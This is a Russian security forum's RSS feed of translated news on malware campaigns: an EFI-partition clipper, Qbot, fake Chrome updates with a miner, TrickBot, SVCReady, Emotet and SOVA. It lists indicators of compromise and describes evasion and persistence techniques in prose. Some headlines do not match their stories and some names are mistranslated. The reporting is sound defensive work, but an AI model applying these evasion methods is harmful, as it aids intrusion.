<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:content="http://purl.org/rss/1.0/modules/content/"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Вирусы &amp; Антивирусы Обсуждение CHKLST.RU — CHKLST.RU</title>
        <link>https://chklst.ru/</link>
        <pubDate>Thu, 16 Jul 2026 20:17:05 +0000</pubDate>
        <language>ru</language>
            <description>Вирусы &amp; Антивирусы Обсуждение CHKLST.RU — CHKLST.RU</description>
    <atom:link href="https://chklst.ru/categories/avirus/feed.rss" rel="self" type="application/rss+xml"/>
    <item>
        <title>Вредоносное ПО Clipper устанавливается через разделы EFI с пиратских ISO</title>
        <link>https://chklst.ru/discussion/1945/vredonosnoe-po-clipper-ustanavlivaetsya-cherez-razdely-efi-s-piratskih-iso</link>
        <pubDate>Wed, 14 Jun 2023 13:48:48 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1945@/discussions</guid>
        <description><![CDATA[Хакеры распространяют Windows 10 с помощью торрентов, которые скрывают угонщиков криптовалюты в разделе EFI (Extensible Firmware Interface), чтобы избежать обнаружения.<br /><br />
Раздел EFI — это небольшой системный раздел, содержащий загрузчик и связанные с ним файлы, выполняемые перед запуском операционной системы. Это важно для систем на базе UEFI, которые заменяют устаревший BIOS.<br /><br />
Были атаки с использованием модифицированных разделов EFI для активации вредоносных программ вне контекста ОС и ее средств защиты, как в случае с BlackLotus. Однако пиратские ISO-образы Windows 10, <a href="https://news.drweb.com/show/?i=14712&amp;lng=en" rel="nofollow">обнаруженные исследователями Dr. Web</a>, просто используют EFI в качестве безопасного места для хранения компонентов клипера.<br /><br />
Поскольку стандартные антивирусные инструменты обычно не сканируют раздел EFI, вредоносное ПО потенциально может обойти обнаружение вредоносного ПО.<br /><br />
В отчете Dr. Web поясняется, что вредоносные сборки Windows 10 скрывают в системном каталоге следующие приложения:<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/w/windows-iso-clipper/installer-folder.png" alt="installer-folder.png" /><br /><br />
\Windows\Installer\iscsicli.exe (дроппер)<br />
\Windows\Installer\recovery.exe (инжектор)<br />
\Windows\Installer\kd_08_5e78.dll (клипер)<br /><br />
Когда операционная система устанавливается с помощью ISO, создается запланированное задание для запуска дроппера с именем iscsicli.exe, который монтирует раздел EFI как диск «M:\». После подключения дроппер копирует два других файла, recovery.exe и kd_08_5e78.dll, на диск C:\.<br /><br />
Затем запускается Recovery.exe, который внедряет DLL-библиотеку вредоносного ПО clipper в легитимный системный процесс %WINDIR%\System32\Lsaiso.exe посредством очистки процесса.<br /><br />
После внедрения клипер проверит, существует ли файл C:\Windows\INF\scunown.inf или запущены ли какие-либо инструменты анализа, такие как Process Explorer, диспетчер задач, Process Monitor, ProcessHacker и т. д.<br /><br />
Если они будут обнаружены, клипер не будет подменять адреса криптовалютных кошельков, чтобы избежать обнаружения исследователями безопасности.<br /><br />
Как только клипер запущен, он будет отслеживать системный буфер обмена на наличие адресов криптовалютных кошельков. Если таковые обнаружены, они на лету заменяются адресами, находящимися под контролем злоумышленника.<br /><br />
Это позволяет злоумышленникам перенаправлять платежи на свои счета, что, по словам Dr. Web, принесло им криптовалюту на сумму не менее 19 000 долларов на адреса кошельков, которые удалось определить исследователям.<br /><br />
Эти адреса были извлечены из следующих ISO-образов Windows, размещенных на торрент-сайтах, но Dr. Web предупреждает, что их может быть больше:<br /><br />
Windows 10 Pro 22H2 19045.2728 + Office 2021 x64 by BoJlIIIebnik RU.iso<br />
Windows 10 Pro 22H2 19045.2846 + Office 2021 x64 by BoJlIIIebnik RU.iso<br />
Windows 10 Pro 22H2 19045.2846 x64 by BoJlIIIebnik RU.iso<br />
Windows 10 Pro 22H2 19045.2913 + Office 2021 x64 от BoJlIIIebnik [RU, EN].iso<br />
Windows 10 Pro 22H2 19045.2913 x64 от BoJlIIIebnik [RU, EN].iso<br /><br />
Следует избегать загрузки пиратских ОС, потому что они могут быть опасны, поскольку те, кто создает неофициальные сборки, могут легко скрыть постоянное вредоносное ПО.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/pirated-windows-10-isos-install-clipper-malware-via-efi-partitions/" rel="nofollow">https://www.bleepingcomputer.com/news/security/pirated-windows-10-isos-install-clipper-malware-via-efi-partitions/</a>]]>
        </description>
    </item>
    <item>
        <title>Qbot: новые методы и блоки атак</title>
        <link>https://chklst.ru/discussion/1859/qbot-novye-metody-i-bloki-atak</link>
        <pubDate>Fri, 11 Dec 2020 05:21:04 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1859@/discussions</guid>
        <description><![CDATA[<img src="https://www.bleepstatic.com/content/hl-images/2020/12/09/Qbot.jpg" alt="Qbot.jpg" /><br /><br />
Новая версия вредоносного ПО <b>Qbot</b> теперь активирует свой механизм сохранения непосредственно перед выключением зараженных устройств Windows и автоматически удаляет все следы при перезагрузке системы или выходе из спящего режима.<br /><br /><b>Qbot (также известный как Qakbot, Quakbot и Pinkslipbot) - это банковский троян для Windows с функциями червя, активными по крайней мере с 2009 года и используемыми для кражи банковских учетных данных, личной информации и финансовых данных.</b><br /><br />
Вредоносная программа также использовалась для регистрации нажатий клавиш пользователем, для установки бэкдоров на взломанных компьютерах и для развертывания маяков Cobalt Strike, используемых операторами программ-вымогателей для доставки полезных нагрузок программ-вымогателей ProLock и Egregor.<br /><br />
В недавних кампаниях жертвы Qbot были заражены с помощью фишинговых писем с вложениями документов Excel, выдаваемых за документы DocuSign.<br /><br />
Начиная с 24 ноября, когда исследователь угроз Binary Defense Джеймс Куинн сообщил, что была обнаружена новая версия Qbot, вредоносная программа использует более новый и скрытый механизм сохранения, который использует сообщения о завершении работы системы и возобновлении работы для переключения сохраняемости на зараженных устройствах.<br /><br />
«В то время как в первоначальных отчетах других исследователей говорилось, что в новой версии Qakbot был удален механизм сохранения ключа Run, он вместо этого был добавлен к более скрытому и интересному механизму сохранения, который прослушивает сообщения о завершении работы системы, а также PowerBroadcast Suspend / Resume сообщения ", - объясняет Куинн.<br /><br />
Троян добавит в реестр раздел Run в зараженных системах, который позволяет ему автоматически запускаться при входе в систему, и будет пытаться немедленно удалить его, как только пользователь включит питание или выйдет из спящего режима компьютер, чтобы избежать обнаружения антивирусными решениями или средствами безопасности.<br /><br />
Что делает эту технику незаметной, так это идеальное время, используемое разработчиками Qbot для внедрения ключа в реестр Windows.<br /><br /><b>Вредоносная программа только добавит ключ запуска перед тем, как система перейдет в спящий режим или выключится, но сделает это настолько близко к тому, что «продукты безопасности не смогут обнаружить новый ключ запуска и сообщить о нем».</b><br /><br />
Затем Qbot попытается удалить ключ сохранения несколько раз после того, как он снова запустится при пробуждении системы или входе в систему.<br /><br />
Хотя этот метод обеспечения устойчивости является новым для Qbot, другие вредоносные программы использовали аналогичные методы для уклонения от обнаружения в прошлом, в том числе банковские трояны Gozi и Dridex.<br /><br />
"Похоже, что два семейства вредоносных программ имеют схожий механизм в том смысле, что оба они прослушивают сообщения WM_QUERYENDSESSION и WM_ENDSESSION, чтобы определить, когда пользователь выходит из системы, но новая версия Qakbot идет дальше, также ища события питания, такие как WM_POWERBROADCAST и PBT_APMSUSPEND для установки своих перехватчиков, когда система также приостановлена »<br /><br /><b>Изменения в установке и конфигурации</b><br /><br />
Методика установки Qbot также была обновлена ​​в этой новой версии, поскольку она использует новую архитектуру DLL, которая объединяет загрузчик вредоносных программ и бота в одной DLL.<br /><br />
Ранее загрузчик избегал обнаружения автоматизированными системами «песочницы» вредоносных программ, сохраняя весь вредоносный код в отдельном компоненте DllRegisterServer и вызывая его только через regsvr32.exe или rundll32.exe при использовании определенных аргументов командной строки.<br /><br />
Новая версия упрощает эту технику, удаляя аргументы командной строки из процесса и переключая внедрение кода бота во вновь созданные процессы.<br /><br />
«Удаление переключателей командной строки и проверок анализа посредством создания нового процесса (при сохранении многих проверок антианализа и песочницы), механизм установки нового загрузчика происходит только после того, как бот был внедрен в explorer.exe»<br /><br /><a href="https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-stealthy-new-windows-autostart-method/" rel="nofollow">https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-stealthy-new-windows-autostart-method/</a><br />]]>
        </description>
    </item>
    <item>
        <title>Через взломанные сайты распространяются вредоносное ПО под видом обновлений для Chrome</title>
        <link>https://chklst.ru/discussion/1939/cherez-vzlomannye-sayty-rasprostranyayutsya-vredonosnoe-po-pod-vidom-obnovleniy-dlya-chrome</link>
        <pubDate>Wed, 12 Apr 2023 10:08:53 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1939@/discussions</guid>
        <description><![CDATA[Через взломанные сайты распространяются вредоносное ПО под видом обновлений для Chrome<br /><br />
Поддельные ошибки обновления Chrome<br /><br />
Атака начинается с компрометации веб-сайтов для внедрения вредоносного кода JavaScript, который выполняет сценарии, когда пользователь посещает их. Эти сценарии будут загружать дополнительные сценарии в зависимости от того, является ли посетитель целевой аудиторией.<br /><br />
Эти вредоносные скрипты доставляются через службу Pinata IPFS (InterPlanetary File System), которая скрывает исходный сервер, на котором размещены файлы, что делает занесение в черный список неэффективным и сопротивляется удалению.<br /><br />
Если целевой посетитель просматривает сайт, сценарии отобразят поддельный экран ошибки Google Chrome, в котором будет указано, что не удалось установить автоматическое обновление, необходимое для продолжения просмотра сайта.<br /><br />
«Произошла ошибка при автоматическом обновлении Chrome. Пожалуйста, установите пакет обновления позже вручную или дождитесь следующего автоматического обновления», — говорится в поддельном сообщении об ошибке Chrome.<br /><br />
Затем сценарии автоматически загружают ZIP-файл с именем «release.zip», который замаскирован под обновление Chrome, которое должен установить пользователь.<br /><br />
Однако этот ZIP-файл содержит майнер Monero, который будет использовать ресурсы процессора устройства для добычи криптовалюты для злоумышленников.<br /><br />
При запуске вредоносное ПО копирует себя в папку C:\Program Files\Google\Chrome как «updater.exe», а затем запускает законный исполняемый файл для выполнения внедрения процесса и запуска прямо из памяти.<br /><br />
По данным VirusTotal, вредоносное ПО использует метод «BYOVD» (принеси свой собственный уязвимый драйвер) для использования уязвимости в законном WinRing0x64.sys для получения привилегий SYSTEM на устройстве.<br /><blockquote>

<div>Майнер сохраняется, добавляя запланированные задачи и выполняя изменения реестра, исключая себя из Защитника Windows.<br /><br />
Кроме того, он останавливает Центр обновления Windows и нарушает связь продуктов безопасности с их серверами, изменяя IP-адреса последних в файле HOSTS. Это препятствует обновлениям и обнаружению угроз и может даже полностью отключить антивирус.</div>
</blockquote>
<br />
После всех этих шагов майнер подключается к xmr.2miners[.]com и начинает майнить трудно отслеживаемую криптовалюту Monero (XMR).<br /><blockquote>

<div>Хотя некоторые из удаленных веб-сайтов являются японскими, NTT предупреждает, что недавнее включение дополнительных языков может указывать на то, что субъекты угрозы планируют расширить сферу своей деятельности, поэтому влияние кампании может вскоре возрасти.</div>
</blockquote>
<br />
Как всегда, никогда не устанавливайте обновления безопасности для установленного программного обеспечения на сторонних сайтах, а устанавливайте их только у разработчиков программного обеспечения или с помощью автоматических обновлений, встроенных в программу.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/hacked-sites-caught-spreading-malware-via-fake-chrome-updates/" rel="nofollow">https://www.bleepingcomputer.com/news/security/hacked-sites-caught-spreading-malware-via-fake-chrome-updates/</a>
<hr /><a href="https://www.virustotal.com/gui/file/2afdcf74d9dbc5575de919e8d041fc06c15044da0844fe9" rel="nofollow">https://www.virustotal.com/gui/file/2afdcf74d9dbc5575de919e8d041fc06c15044da0844fe9</a>­326b8f1b4bedad291/behavior<br /><a href="https://www.virustotal.com/gui/file/cb1a228b5f9001dd9acf4fc1296c3f60b9014ae487df12b" rel="nofollow">https://www.virustotal.com/gui/file/cb1a228b5f9001dd9acf4fc1296c3f60b9014ae487df12b</a>­c8bb2fbc639a72290/behavior<br /><blockquote>

<div>Полное имя                  C:\PROGRAM FILES\GOOGLE\CHROME\UPDATER.EXE<br />
Имя файла                   UPDATER.EXE<br />
Тек. статус                 ?ВИРУС? ВИРУС в автозапуске<br /><br />
Обнаруженные сигнатуры<br />
Сигнатура                   Win64/Kryptik.DQA (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2023-04-05<br /><br />
www.virustotal.com          2023-03-10 23:29 [2023-02-09]<br />
K7AntiVirus                 Trojan ( 0059bdd61 )<br />
Symantec                    ML.Attribute.HighConfidence<br />
ESET-NOD32                  a variant of Win64/Kryptik.DQA<br />
Kaspersky                   Trojan.Win32.Agent.xatoxm<br />
BitDefender                 Trojan.GenericKD.65483364<br />
Avast                       Win64:Evo-gen [Trj]<br />
DrWeb                       Trojan.Siggen19.45027<br />
Emsisoft                    Trojan.GenericKD.65483364 (B)<br />
Microsoft                   Trojan:Win64/CoinMiner.DC!MTB<br /><br />
Сохраненная информация      на момент создания образа<br />
Статус                      в автозапуске<br />
File_Id                     63DD6E43398000<br />
Linker                      2.38<br />
Размер                      3738624 байт<br />
Создан                      03.03.2023 в 05:43:17<br />
Изменен                     03.03.2023 в 05:43:18<br /><br />
TimeStamp                   03.02.2023 в 20:27:47<br />
EntryPoint                  +<br />
OS Version                  0.0<br />
Subsystem                   Windows graphical user interface (GUI) subsystem<br />
IMAGE_FILE_DLL              -<br />
IMAGE_FILE_EXECUTABLE_IMAGE +<br />
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ<br />
Цифр. подпись               Отсутствует либо ее не удалось проверить<br /><br />
Доп. информация             на момент обновления списка<br />
SHA1                        0BBD1560602ACA4210660580C00B36B3726B0F63<br />
MD5                         FB6F76B4F93ACC6FCD026EB66652E939<br /><br />
Ссылки на объект<br />
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\GOOGLEUPDATETASKMACHINEQC<br />
Task                        \GoogleUpdateTaskMachineQC<br /><br />
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BA1EBB6-9C3B-4FF1-9B4A-9889539EB664}\Actions<br />
Actions                     "C:\Program Files\Google\Chrome\updater.exe"<br />
Задача создана              26.02.2023 в 22:34:55<br />
Последний запуск            24.03.2023 в 12:04:26<br />
Код ошибки                  0x0<br /><br />
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{1BA1EBB6-9C3B-4FF1-9B4A-9889539EB664}\</div>
</blockquote>
<br /><img src="https://chklst.ru/uploads/editor/ds/djzi3t1ru714.jpg" alt="djzi3t1ru714.jpg" /><br />
+<br />
false proxy<br />
хттп://34.80.59.191/WIN.PAC<br />]]>
        </description>
    </item>
    <item>
        <title>TrickBot: US, UK + TrickBot, Conti= санкции</title>
        <link>https://chklst.ru/discussion/1856/trickbot-us-uk-trickbot-conti-sankcii</link>
        <pubDate>Sun, 22 Nov 2020 15:11:15 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1856@/discussions</guid>
        <description><![CDATA[<b><b>TrickBot: выпущено обновление вредоносного ПО с новыми функциями</b></b><br /><br />
Киберпреступная группа <b>TrickBot</b> выпустила сотую версию (v100) вредоносного ПО <b>TrickBot с дополнительными функциями, позволяющими избежать обнаружения.</b><br /><br /><img src="https://www.bleepstatic.com/content/hl-images/2017/09/03/TrickBot-Logo.png" alt="TrickBot-Logo.png" /><br /><br /><br />
TrickBot - это вредоносное ПО, которое обычно устанавливается через вредоносные фишинговые сообщения электронной почты или другое вредоносное ПО. После установки TrickBot будет незаметно работать на компьютере жертвы, пока он загружает другие модули для выполнения различных задач.<br /><br />
Эти модули выполняют широкий спектр злонамеренных действий, включая кражу базы данных служб Active Directory домена, распространение в сети, блокировку экрана, кражу файлов cookie и паролей браузера, а также кражу ключей OpenSSH.<br /><br />
Известно, что TrickBot завершает атаку, предоставляя доступ к злоумышленникам, стоящим за вымогателями Ryuk и Conti, что еще больше усугубляет ситуацию.<br /><br /><b>В TrickBot v100 добавлены новые функции</b><br /><br />
После того, как в прошлом месяце Microsoft и их партнеры провели скоординированную атаку на инфраструктуру TrickBot, появилась надежда, что им потребуется время, чтобы восстановиться.<br /><br />
К сожалению, TrickBot все еще не утихает, о чем свидетельствует выпуск сотой сборки вредоносного ПО TrickBot.<br /><br />
Эта последняя сборка была обнаружена Виталием Кремезом из Advanced Intel, который обнаружил, что они добавили новые функции, которые затрудняют обнаружение.<br /><br />
В этом выпуске TrickBot теперь внедряет свою DLL в легитимный исполняемый файл Windows wermgr.exe (Windows Problem Reporting) прямо из памяти с помощью кода из проекта MemoryModule.<br /><br />
«MemoryModule - это библиотека, которую можно использовать для полной загрузки DLL из памяти - без предварительного сохранения на диск», - поясняет страница проекта на GitHub.<br /><br />
Первоначально запущенный как исполняемый файл, TrickBot внедрится в wermgr.exe, а затем завершит работу исходного исполняемого файла TrickBot.<br /><br />
По словам Кремеза, при внедрении DLL она будет делать это с помощью Doppel Hollowing или обработки двойного соединения, чтобы избежать обнаружения программным обеспечением безопасности.<br /><br />
«Этот метод использует транзакции, функцию NTFS, которая позволяет сгруппировать набор действий в файловой системе, и если какое-либо из этих действий не удается, происходит полный откат. Процесс инжектора создает новую транзакцию, внутри которой он создает новый файл, содержащий вредоносную полезную нагрузку. Затем он сопоставляет файл внутри целевого процесса и, наконец, откатывает транзакцию. Таким образом, создается впечатление, что файл никогда не существовал, даже если его содержимое все еще находится в памяти процесса, "Описание этого метода, сделанное исследователем безопасности Франческо Мурони.<br /><br />
Как видите, кибергруппа TrickBot не позволила нарушению своей инфраструктуры сдерживать их, и они продолжают интегрировать новые функции, чтобы предотвратить обнаружение вредоносного ПО.<br /><br />
К сожалению, это означает, что <b>TrickBot останется с нами в обозримом будущем, а потребителям и предприятиям необходимо внимательно следить за тем, какие вложения электронной почты они открывают.</b><br /><br /><a href="https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/" rel="nofollow">https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/</a><br />]]>
        </description>
    </item>
    <item>
        <title>Новое вредоносное ПО использует бэкдоры на серверах VMware ESXi для захвата виртуальных машин</title>
        <link>https://chklst.ru/discussion/1930/novoe-vredonosnoe-po-ispolzuet-bekdory-na-serverah-vmware-esxi-dlya-zahvata-virtualnyh-mashin</link>
        <pubDate>Fri, 10 Jun 2022 10:59:46 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1930@/discussions</guid>
        <description><![CDATA[<b>Новое вредоносное ПО загружается из свойств документа Word</b><br /><br />
В ходе фишинговых атак был обнаружен ранее неизвестный загрузчик вредоносного ПО под названием <b>SVCReady</b>, отличающийся необычным способом загрузки вредоносного ПО из документов Word на скомпрометированные машины.<br /><br />
В частности, он использует макрокод VBA для выполнения шелл-кода, хранящегося в свойствах документа, который поступает к цели в виде вложения электронной почты.<br /><br />
Согласно новому отчету HP, вредоносное ПО находится в стадии развертывания с апреля 2022 года, а разработчики выпустили несколько обновлений в мае 2022 года. Это указывает на то, что в настоящее время оно находится в активной разработке и, вероятно, все еще находится на ранней стадии.<br /><br />
Однако он уже поддерживает эксфильтрацию информации, сохранение, функции антианализа и зашифрованные коммуникации C2.<br /><br />
SVCReady начинается с электронного письма<br /><br />
Цепочка заражения начинается с фишингового письма с вредоносным вложением .doc.<br /><br />
Однако, в отличие от стандартной практики использования PowerShell или MSHTA через вредоносные макросы для загрузки полезной нагрузки из удаленных мест, эта кампания использует VBA для запуска шелл-кода, скрывающегося в свойствах файла.<br /><br />
Как показано ниже, этот шелл-код хранится в свойствах документа Word, который извлекается и выполняется макросами.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1220909/Software/properties.png" alt="properties.png" /><br /><br />
Отделяя макросы от кода вредоносной оболочки, злоумышленники пытаются обойти программное обеспечение безопасности, которое обычно может их обнаружить.<br /><br />
«Затем в переменную загружается шелл-код, который находится в свойствах документа. В зависимости от того, является ли архитектура системы 32-битной или 64-битной, загружается другой шелл-код», — поясняется <b><a href="http://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/" rel="nofollow">в отчете HP.</a></b><br /><br />
Соответствующий шелл-код загружается в память tino, откуда он будет использовать функцию Windows API «Виртуальная защита» для получения прав доступа к исполняемому файлу.<br /><br />
Далее API SetTimer передает адрес шелл-кода и выполняет его. Это действие приводит к тому, что DLL (вредоносная полезная нагрузка) попадает в каталог %TEMP%.<br /><br />
Копия «rundll32.exe», законного двоичного файла Windows, также помещается в тот же каталог под другим именем и в конечном итоге используется для запуска SVCReady.<br /><br />
Новый загрузчик вредоносных программ SVCReady<br /><br />
Вредоносная программа SVCReady начинает с профилирования системы с помощью запросов к реестру и вызовов Windows API и отправляет всю собранную информацию на сервер C2 с помощью HTTP-запроса POST.<br /><br />
Связь с C2 шифруется с помощью ключа RC4. Аналитики HP отмечают, что эта функция была добавлена в мае во время одного из обновлений зловреда.<br /><br />
Вредоносная программа также делает два запроса WMI на хосте, чтобы выяснить, работает ли он в виртуализированной среде, и переходит в спящий режим на 30 минут, если это так, чтобы избежать анализа.<br /><br />
В настоящее время механизм сохраняемости основан на создании запланированной задачи и нового ключа реестра, но из-за ошибок в реализации вредоносная программа не запустится после перезагрузки.<br /><br />
После всего этого начинается второй этап сбора информации, который включает в себя скриншоты, извлечение «osinfo» и отправку всего на C2.<br /><br />
SVCReady подключается к C2 каждые пять минут, чтобы сообщить о своем статусе, получить новые задачи, отправить украденную информацию или проверить домен.<br /><br />
В настоящее время SVCReady поддерживает следующие функции:<br /><br />
Загрузить файл в зараженный клиент<br />
Сделать снимок экрана<br />
Запустить команду оболочки<br />
Проверьте, работает ли он на виртуальной машине<br />
Сбор системной информации (короткая и «обычная» версия)<br />
Проверьте состояние USB, т. е. количество подключенных устройств.<br />
Установите постоянство с помощью запланированной задачи<br />
Запустить файл<br />
Запустите файл с помощью RunPeNative в памяти<br /><br />
Наконец, вредоносное ПО также может получать дополнительные полезные нагрузки. Аналитики HP наблюдали один случай 26 апреля 2022 г., когда SVCReady сбросил полезную нагрузку Readline Stealer на зараженный хост.<br /><br />
Ссылки на ТА551<br /><br />
HP сообщает, что видит ссылки на прошлые кампании TA551 (Shatak), такие как изображения-приманки, используемые во вредоносных документах, URL-адреса ресурсов, используемые для получения полезной нагрузки и т. д. Ранее фишинговая группировка использовала эти домены для размещения полезных нагрузок Ursnif и IcedID.<br /><br />
TA551 был связан с различными операторами вредоносных программ и даже с филиалами программ-вымогателей, поэтому связь с SVCReady в настоящее время неясна и может быть партнерством по распространению.<br /><br />
Однако, поскольку вредоносное ПО, похоже, находится на ранней стадии разработки, его тестирование с помощью TA551 кажется маловероятным, поэтому это может быть собственный проект вредоносного ПО группы.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/new-svcready-malware-loads-from-word-doc-properties/" rel="nofollow">https://www.bleepingcomputer.com/news/security/new-svcready-malware-loads-from-word-doc-properties/</a>]]>
        </description>
    </item>
    <item>
        <title>Ботнет Emotet продвигает программы-вымогатели Quantum и BlackCat</title>
        <link>https://chklst.ru/discussion/1913/botnet-emotet-prodvigaet-programmy-vymogateli-quantum-i-blackcat</link>
        <pubDate>Tue, 16 Nov 2021 06:12:30 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1913@/discussions</guid>
        <description><![CDATA[<b>Emotet возвращается и восстанавливает свой ботнет</b><br /><br />
Вредоносное ПО Emotet в прошлом считалось наиболее распространенным вредоносным ПО, которое использовало спам-кампании и вредоносные вложения для распространения вредоносного ПО.<br /><blockquote>

<div>Затем Emotet будет использовать зараженные устройства для проведения других спам-кампаний и установки других полезных нагрузок, таких как вредоносное ПО QakBot (Qbot) и Trickbot. Эти полезные данные затем будут использоваться для предоставления первоначального доступа злоумышленникам для развертывания программ-вымогателей, включая Ryuk, Conti, ProLock, Egregor и многие другие.</div>
</blockquote>
<br />
В начале года международная правоохранительная операция, координируемая Европолом и Евроюстом, захватила инфраструктуру Emotet и арестовала двух человек.<br /><br />
Немецкие правоохранительные органы использовали эту инфраструктуру для доставки модуля Emotet, который удалил вредоносное ПО с зараженных устройств 25 апреля 2021 года.<br /><br />
Emotet возвращается после операции правоохранительных органов<br /><br />
Сегодня исследователи из Cryptolaemus, Gdata и Advanced Intel начали видеть вредоносную программу Trybot, который устанавливает загрузчик для Emotet на зараженных устройствах.<br /><br />
В то время как в прошлом Emotet установил Trybot, в настоящее время используется метод, чтобы восстановить ботнет Emoot, используя существующую инфраструктуру TryboT.<br /><br />
Vitali Kremez из Advanced Intel проанализировал установщик Emotet и предупредил, что возрождение вредоносного ботнета, вероятно, приведет к участию инфекций ransomware.<br /><br />
«Это ранний признак возможного предстоящего возвращения Emotet, наносящий вредоносную активность, выполняющего основные операции по ransomware по всему миру.<br /><blockquote>

<div>«Это говорит нам, что удаление Emotet не помешало противникам найти средство построения вредоносных программ и создать бэкэндскую систему, возвращающую ее обратно в жизнь».</div>
</blockquote>
Кремез сообщил, что нынешняя DLL загрузчика Emotet имеет компиляцию с Timestamp от  (Sun Nov 14 20:50:34 2021)».<br /><br />
Защищать против нового ботнета Emotet<br /><br />
Занимающаяся отслеживанием malware некоммерческая организация Abuse.ch выпустила <a href="https://feodotracker.abuse.ch/browse/emotet/" rel="nofollow"><b>список серверов команд и управления</b></a>, используемых новым ботнетом Emotet, и настоятельно рекомендует, чтобы администраторы сети блокировали соответствующие IP-адреса.<br /><br /><img src="https://chklst.ru/uploads/editor/0l/ythsxaxf4hmr.jpg" alt="ythsxaxf4hmr.jpg" /><br /><br />
К сожалению, новая инфраструктура Emotet быстро растет, причем уже более 246 инфицированных устройств действуют в виде серверов команд и контроля.<br /><br /><b>Сетевым администраторам настоятельно рекомендуются блокировать все связанные IP-адреса, чтобы предотвратить добавление их устройств в недавно восстановленный ботнет Emotet. </b><br /><br /><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/" rel="nofollow">https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/</a>]]>
        </description>
    </item>
    <item>
        <title>Вредоносная программа SOVA добавляет функцию вымогателей для шифрования устройств Android</title>
        <link>https://chklst.ru/discussion/1932/vredonosnaya-programma-sova-dobavlyaet-funkciyu-vymogateley-dlya-shifrovaniya-ustroystv-android</link>
        <pubDate>Sun, 14 Aug 2022 10:41:01 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1932@/discussions</guid>
        <description><![CDATA[
<blockquote>

<div>Банковский троян SOVA для Android продолжает развиваться, добавляя новые функции, улучшения кода и добавление новой функции программы-вымогателя, которая шифрует файлы на мобильных устройствах.</div>
</blockquote>
<br />
В последнем выпуске вредоносное ПО SOVA теперь нацелено на более 200 банковских приложений, приложений для обмена криптовалютами и цифровых кошельков, пытаясь украсть у них конфиденциальные пользовательские данные и файлы cookie.<br /><br />
Кроме того, он имеет рефакторинг и улучшенный код, который помогает ему работать более скрытно на скомпрометированном устройстве, а в его последней версии 5.0 добавлен модуль вымогателя.<br /><br />
Быстрая эволюция<br /><br />
Аналитики угроз компании Cleafy, занимающейся безопасностью мобильных устройств, следили за эволюцией SOVA с момента объявления проекта в сентябре 2021 года и сообщают, что в 2022 году его развитие резко ускорилось.<br /><br />
В марте 2022 года SOVA выпустила версию 3, добавив перехват 2FA, кражу файлов cookie и новые инъекции для нескольких банков по всему миру. Инъекции — это наложения, отображаемые поверх законных запросов на вход в систему, которые используются для кражи учетных данных, например, для приложений онлайн-банка.<br /><br />
В июле 2022 года команда разработчиков SOVA выпустила версию 4, в которой количество целевых приложений увеличилось до 200, а также были добавлены возможности VNC (виртуальные сетевые вычисления) для мошенничества на устройстве.<br /><br />
Вредоносное ПО отправляет список установленных приложений на C2 и получает XML, содержащий список адресов, указывающих на правильные оверлеи, которые должны загружаться, когда жертва открывает целевое приложение.<br /><br />
В четвертой основной версии также добавлена поддержка таких команд, как создание снимков экрана, выполнение щелчков и пролистываний, копирование и вставка файлов, а также отображение наложенных экранов по желанию.<br /><br />
В этом выпуске также был проведен значительный рефакторинг кода в механизме кражи файлов cookie, который теперь ориентирован на Gmail, GPay и Google Password Manager.<br /><br />
SOVA v4 добавила некоторые средства защиты от защитных действий, злоупотребляя разрешениями на доступность, чтобы вернуть пользователя на главный экран, если он попытается удалить приложение вручную.<br /><br />
Наконец, четвертая версия была ориентирована на Binance и приложение платформы «Trust Wallet» с использованием специального модуля, созданного для кражи секретной фразы пользователя.<br /><br />
Новый модуль вымогателей<br /><br />
Совсем недавно Cleafy протестировала ранний выпуск SOVA v5, в который были внесены многочисленные улучшения кода и добавлены новые функции, такие как модуль программы-вымогателя.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/ransomware-module.png" alt="ransomware-module.png" /><br />
Модуль использует шифрование AES для блокировки всех файлов на зараженных устройствах и добавления расширения «.enc» к переименованным зашифрованным файлам.<br /><blockquote>

<div>«Функция программы-вымогателя весьма интересна, поскольку она до сих пор не распространена среди банковских троянов Android. Она активно использует возможности, появившиеся в последние годы, поскольку мобильные устройства стали для большинства людей центральным хранилищем личных и деловых данных».</div>
</blockquote>
Однако пятая версия еще не получила широкого распространения, а ее модуль VNC отсутствует в ранних образцах, поэтому вполне вероятно, что эта версия все еще находится в стадии разработки.<br /><br />
